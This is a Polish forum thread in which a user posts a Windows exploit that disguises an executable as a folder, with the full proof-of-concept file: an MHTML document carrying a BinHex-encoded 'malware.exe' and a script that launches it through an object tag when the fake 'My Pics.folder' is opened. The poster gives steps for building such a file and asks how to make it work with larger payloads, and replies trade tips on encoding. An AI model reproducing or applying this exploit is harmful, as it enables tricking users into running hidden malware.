Podczepienie pliku exe pod folder - Dziura w Windows

[mitro]

Co wy na to?
Ktos z was juz to sprawdzal? Jesli komus to sie uda niech pisze jak dokladniej to zrobil.
Ps. ja takze to robilem lae na duzych plikcha nie chcialo dzialac hmm nie wiem czemu...Dlatego to tu wstawiam...

Opis
Dziura nie jest dość poważna jednak stwarza duże zagrożenie. Polega ona na możliwości wklejenia kodu(programu) do kodu folderu(prowizorycznego). Dzięki czemu przy próbie otwarcia folderu zostaje uruchomiony kod programu. Czyli mamy możliwość stworzyć plik który będzie wyglądał jak folder a otwarcie go spowoduje uruchomienie kodu. Sprawa jest o tyle nie dobra, że to może to być wirus czy dowolny program. Zanim jednak to zrobimy musimy przelecieć program BinHex`e.

Przykładowy kod takiego folderu znajdziemy na http://www.malware.com/my.pics.zip

A wygląda on tak:

<html>



MIME-Version: 1.0

Content-Location:malware.exe

Content-Transfer-Encoding: mac-binhex40

 

(This file must be converted with BinHex 4.0)

:#feKE(GKFQ8ZCAKP!%**6N&YC'pc!!!!!!P%!!!!!0`)69T%!38!!J!J!#%!rrp

e!!!#!!#C!!!!2J!!!!%!qc"UFJ!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!"

j!!!!RJ!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!CM2!-rq-di2$),P`2il

$mfDVM-#1f,J!S)l!`fDj!2S!!'Dr!!!!!'DqJ3)!!'Bc`'H+Rd!"!!!$f-(M"#[

B+pKQ`FJ3!pLX!pM"k`9RL"p(iYl$ZB!q-rmcp[0QTF-H"ScB"D!2MX#i$`#1f$2

!CiS$Lr#r#J#j,!(cT)[`JmF8Z5`"mk3((m1`%md3ZJm!MYUq5!1kb!-b`1j#Z3!

$mflSA2pQ-p[SYIp6k'lrZYS$l+J)GI[XU!KdqqL@re[q`l3"c4Cdi,J$!-d3Z!"

-c5%!!!!!!!!!!!!!!!!!!!#a`*!!(AZ)f5CV`X')Z-QN1SYrNijF-0XI1Rq09c2

"M,&hQ)RDDpGFKRbVU)iLd0QJASAC,U,$E'0X455r)CH1d)SD[m#E&LDbRGH+,E1

-*%QPM5QI,BGFaXGD1*H@,5S9cD9cc+kQAA@N)V1IM0Gh*UG@X,KNK"YDf4h1VcB

lQ(c$1%c!'L)HcdCjBQ)GH0I2EGTrE+)PPmK,`XJcF+8T("QlU@NBSc5I8@-c'cT

p9i'p)+R9)aP96&@UBKQKL5-VDc"bNMP5P+JeEPI+c-M,Qm&a4QYKDbTqFFG*V6T

2Um&I&@HRa$b(N!"CLYGNb#'q'fb3!,$BFj&3G8%m6&E@2k)X(,PPf(E'1,94Z61

d5'5%9ULJVKfF`KZ$NpYC9#*eF+qH'Aji0(eGUU&H98Dl[K6&'N9H&$[&Hffl3)'

YHY*+MMfdePbTaLE(Q&M'IEX9[RM2aA4mGDSVGbA"AkFM`BV2edP99*Z%LP9G04p

a*C*jeFq#,L0GLc@+6RBFaRiQ'DqR-MM155`Xd"4R15dTJc1#cUh2c5JD(ML`cN%

ZHdK-+p+5[FZA*,Jj`TaDfG0M&pGa'$!`PQFFRP"&@$#,a(q&QNc*@,-Ide-J*-R

@d+KDS8L5Hp0`XR)Ucl@2`@-Y(fiFYV,!,VBQ'E8JZ9`82FNU85"k1l-VcVJrN!#

S,mp1cfJS'a5rEk)FKBM3UPiBYaSHaRrCP'fXY8aCX'l!66fN`&U3!'8i8cKKJFU

N2*BS5AL'9#pM,N*Q9bJVPEpBAP'9AU)pFFQScDl"905m+TafRN1HK*+VT$XE[lP

eC9kc2)b83E@6Z&RE`SI9GQ"K1dHT&Ak@SMKJBS#E+Pl,Tfp(JcD#Mh)B0imJ6YL

HXCZ&2U0`AiT8@bh'U+GSMC3H4+3@JlbC@$l&RK92R(JkDRmU-Tp)-%GCE6fU5(f

ZVpYbU0R4+TLe5E`fDaG&dMlE0l&RJ+#CRC1*Nj!!L*!!4eKP@X6)J#k!S)phQPj

2dl151S%E6FdVf+&ERf-qeUFA9AacbC!!a61&JV)jH'6"2-*hJ%dK0jBTD8V'5P2

#CC4S9)bRD(4!HFG48@11MBf5@cF`FR*(SSkaK&%GSNXQ8eKmA,%kPka@Ym4#[$p

PJJ!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

!!!m!!"!!!"%!!")!!"-!!"3!!"8!!"B!!"F!!"J!!"N!!"S!!"X!!"`!!"d!!"i

!!"m!!#!!!#%!!#)!!#-!!#3!!#8!!#B!!#F!!#J!!#N!!#S!!#X!!#`!!#d!!#i

!!#m!!$!!!$%!!$)!!$-!!$3!!$8!!$B!!$F!!$J!!$N!!$S!!$X!!$`!!$d!!$i

!!$m!!$m!!$m!!$m"!$m#!$m$!$m%!$m&!$m'!$m(!$m)!$m*!$m+!$m,!$m-!$m

0!$m1!$m2!$m3!$m4!$m5!$m6!$m8!$m9!$m@!$mA!$mB!$mC!$mD!$mE!$mF!$m

G!$mH!$mI!$mJ!$mK!$mL!$mM!$mN!$mP!$mQ!$mR!$mS!$mT!$mU!$mV!$mX!$m

Y!$mZ!$m[!$m`!$ma!$mb!$mc!$md!$me!$mf!$mh!$mi!$mj!$mk!$ml!$mm!$m

p!$mq!$mr!$mr!$mr!$mr!6mr!Mmr!cmr"$mr"6mr"Mmr"cmr#$mr#6mr#Mmr#cm

r$$mr$6mr$Mmr$cmr%$mr%6mr%Mmr%cmr&$mr&6mr&Mmr&cmr'$mr'6mr'Mmr'cm

r($mr(6mr(Mmr(cmr)$mr)6mr)Mmr)cmr*$mr*6mr*Mmr*cmr+$mr+6mr+Mmr+cm

r,$mr,6mr,Mmr,cmr-$mr-6mr-Mmr-cmr0$mr06mr0Mmr0cmr1$mr16mr1Mmr1cm

r2$mr26mr2Mmr2cmr2p$Y!!!!:



<title>malware.com</title>

<body bgcolor=black scroll=no>

<SCRIPT>

//25.02.03 - [url]http://www.malware.com[/url]

function malware()

{

s=document.URL;path=s.substr(-0,s.lastIndexOf(""));

path=unescape(path);

document.write( ' <title>malware.com</title><body scroll=no bgcolor=black><FONT face="Comic Sans MS" color=red style="position:absolute;top:20;left:90;z-index:100; font-size:2cm;">malware.com </center><object style="cursor:cross-hair" alt="moo ha ha" classid="clsid:77777777-7777-7777-7777"  codebase="mhtml:'+path+'My Pics.folder!malware.exe"></object>')

}

setTimeout("malware()",150)

</script>

Wystarczy teraz tę kod zapisać jako "My Pics.Folder" i mamy prowizoryczny folder z automatycznym otwarcie programu znajdującego się w nim.

 

[Kazuya]

to ładnie a Ty odkryłeś to ?

 

[Lechusky]

skopiowane z T-NAS. ;]

 

[Kazuya]

Plagiat :?

 

[mitro]

co wy czytac nie umiecie?

Co wy na to?
Ktos z was juz to sprawdzal? Jesli komus to sie uda niech pisze jak dokladniej to zrobil.
Ps. ja takze to robilem lae na duzych plikcha nie chcialo dzialac hmm nie wiem czemu...Dlatego to tu wstawiam...[/b]

ehh
nie pisalem ze to ja odnalazlem zrobilem...ja sie tylko pytam czy komus udalo sie to zrbic na wiekszych plikach ztakich do 400 kb

 

[GreEnSnake]

Jesli zostalo to opublikowane to chyba logiczne ze to dziala tylko widocznie Ty cos zle robisz =] .

 

[rafal759]

Żeście na niegona krzyczeli jakby zrobił niewiadomo co, założył ten topic nie po to żeby przedstawiać to wyżej jako swoje dzieło pracy, tylko mu coś nie wychodzi z plikami większymi niż 400kb i pewnie chodziło mu o to greensnake, że coś żle robi i chciał się poradzić, spytać jak komuś to się udało. Trzeba poprostu czytać posty ze zrozumieniem

.

 

[wrna]

Mozecei powiedziec jakim programem mozna zamienic plik exe na ten binhex ?

 

[Hunter]

po 1: ten przyklad co wkleiles nie zadziala
po 2: jak zadziala to napewno nie na firefox =)

 

[Pedrosov]

<div class='quotetop'>CYTAT("hunter0404")</div>

po 1: ten przyklad co wkleiles nie zadziala
po 2: jak zadziala to napewno nie na firefox =)[/b]

Wez przeczytaj pierwszy post raz jeszcze. To nie jest strona dzieki ktorej sie da wrzucic program przez www. Zapisz to jako folder i wejdz do niego. Windows w wyswietlaniu plikow uzywa ie dlatego takie cuda robic mozna.

 

[Hunter]

def. browser ustawiony na ff, ie nie mam w systemie =)

Ps. czyli przykladowo moge kazdy podobny kod zapisac sobie jako "fodler" i wszystko zadziala bo korzysta z ie?

 

[Pedrosov]

<div class='quotetop'>CYTAT("hunter0404")</div>

def. browser ustawiony na ff, ie nie mam w systemie =)[/b]

Nie plec bzdur, to ze wywaliles ikone nie znaczy ze ie nie masz w systemie. IE bedzie na wieki wiekow w twoim systemie bo za bardzo jest zintegrowane z systemem i po prostu nie da sie go wywalic za duzo rzeczy z tego korzysta.

 

[SZKOD[nick]]

<div class='quotetop'>CYTAT("Pedrosov")</div>

<div class='quotetop'>CYTAT("hunter0404")

def. browser ustawiony na ff, ie nie mam w systemie =)[/b]

Nie plec bzdur, to ze wywaliles ikone nie znaczy ze ie nie masz w systemie. IE bedzie na wieki wiekow w twoim systemie bo za bardzo jest zintegrowane z systemem i po prostu nie da sie go wywalic za duzo rzeczy z tego korzysta.[/b][/quote]
Nie pleć bzdur, da się : )

 

[Robinmaster]

Skad mozna sciagnac BinHex 4.0 ?? zeby zakodowac plik

 

[FDJ]

Originally posted by Robinmaster
Skad mozna sciagnac BinHex 4.0 ?? zeby zakodowac plik

www.google.pl